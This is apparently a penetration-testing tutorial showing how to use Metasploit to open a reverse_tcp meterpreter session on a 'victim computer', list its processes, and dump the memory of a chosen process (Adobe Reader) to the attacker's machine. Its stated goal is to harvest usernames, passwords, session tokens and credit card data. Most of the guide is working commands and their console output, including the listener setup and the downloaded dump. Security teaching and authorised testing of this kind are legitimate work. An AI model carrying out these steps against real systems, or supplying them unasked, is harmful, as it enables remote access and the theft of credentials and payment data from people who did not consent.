Process Memory Dump
Introduction
Metasploit contains a post exploitation module to dump the memory of a process. This is normally used to gather information such as usernames and passwords, session tokens, and credit card data.
Step-by-Step Guide
1. Create the meterpreter binary
How-To: Creating a Meterpreter Binary
2. Open Metasploit Console
msfconsole
2. Create and run a listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100
meterpreter >
3. Execute your meterpreter binary on the victim computer
4. Check for target process to dump (e.g. AcroRd32.exe)
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
236 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
312 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
316 452 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
360 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
368 352 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
396 352 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
452 360 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
468 360 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
476 360 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
564 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
648 452 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
720 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
792 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
820 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
996 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1036 452 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1064 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1212 1724 AcroRd32.exe x86 1 WIN7-1\win7 C:\Program Files (x86)\Adobe\Reader
9.0\Reader\AcroRd32.exe
...
5. Use ‘post/windows/gather/memory_dump’ module to dump the process memory.
Command: run post/windows/gather/memory_dump PID=<Process PID>
meterpreter > run post/windows/gather/memory_dump PID=1212
[*] Running module against WIN7-1 (192.168.0.166)
[*] Dumping memory for AcroRd32.exe (pid: 1212) to C:\Users\win7\AppData\Local\Temp\bfleZlzWhtk
[*] Downloading minidump (8.50 MiB)
[+] Memory dump stored at /root/.msf4/loot/20240131125804_default_192.168.0.166_windows.process._803063.bin
[*] Deleting minidump from disk
The dump file is automatically saved and trasferred to /root/.msf4/loot/ directory.
Video Demonstration
Reference
https://www.infosecmatter.com/metasploit-module-library/?mm=post/windows/gather/memory_dump